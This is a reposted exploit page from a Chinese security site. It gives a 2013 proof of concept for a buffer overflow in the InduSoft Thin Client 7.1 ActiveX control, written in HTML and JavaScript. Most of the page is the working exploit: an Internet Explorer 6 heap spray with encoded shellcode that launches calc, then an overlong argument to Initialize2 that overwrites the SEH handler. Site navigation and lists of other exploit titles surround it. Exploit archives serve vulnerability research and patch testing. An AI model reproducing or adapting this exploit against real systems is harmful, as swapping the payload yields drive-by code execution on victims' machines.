首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Indusoft Thin Client 7.1 ActiveX - Buffer Overflow
来源:vfocus.net 作者:Blake 发布时间:2013-10-11  
<html>
<!--
InduSoft Thin Client v7.1
Date: October 8, 2013
Exploit Author: Blake
Software Link: http://www.indusoft.com/Products-Downloads/Download-Library
Version: 7.1
Tested on: Windows XP SP3 / IE6
  
Affected File:i386\novapi7.dll
Member Name: Initialize2
Program ID: NovaPdfOptions
Prototype: Sub Initialize2 ( ByVal p_wsPrinterName As String ,  ByVal p_wsUserName As String ,  ByVal p_wsLicenseKey As String ,  ByVal p_wsApplicationName As String )
-->
  
<object classid='clsid:0FAB2D9D-DC57-4C4F-939C-38C5382D71BA' id='target' ></object>
<script>
  
// heap spray for IE6
// calc - 196 bytes
var shellcode = unescape('%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063');
var bigblock = unescape('%u9090%u9090');
var headersize = 20;
  
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0,slackspace);
  
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0x50000) block = block + block + fillblock;
  
var memory = new Array();
for (i = 0; i < 500; i++){ memory[i] = block + shellcode }
  
alert("Spray finished, ready to trigger the crash");
  
buffer = "";
while(buffer.length < 262) buffer+="A";
next_seh = "BB";
seh = unescape("%u0606%u0606");
junk = "";
while(junk.length < 8740) junk+="D";
  
var arg2="defaultV";
var arg3="defaultV";
var arg4="defaultV";
  
var arg1=buffer + next_seh + seh + junk;
  
target.Initialize2(arg1,arg2,arg3,arg4); 
  

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ONO Hitron CDE-30364 Router -
·VMware Hyperic HQ Groovy Scrip
·ALLPlayer 5.6.2 (.m3u) - Local
·Beetel Connection Manager SEH
·Internet Haut Debit Mobile Buf
·Android Zygote Socket Vulnerab
·davfs2 1.4.6/1.4.7 - Local Pri
·MS13-080 Microsoft Internet Ex
·Abuse HTTP Server 2.8 Denial O
·HP Data Protector Cell Request
·PinApp Mail-SeCure Access Cont
·Zabbix 2.0.8 SQL Injection / R
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved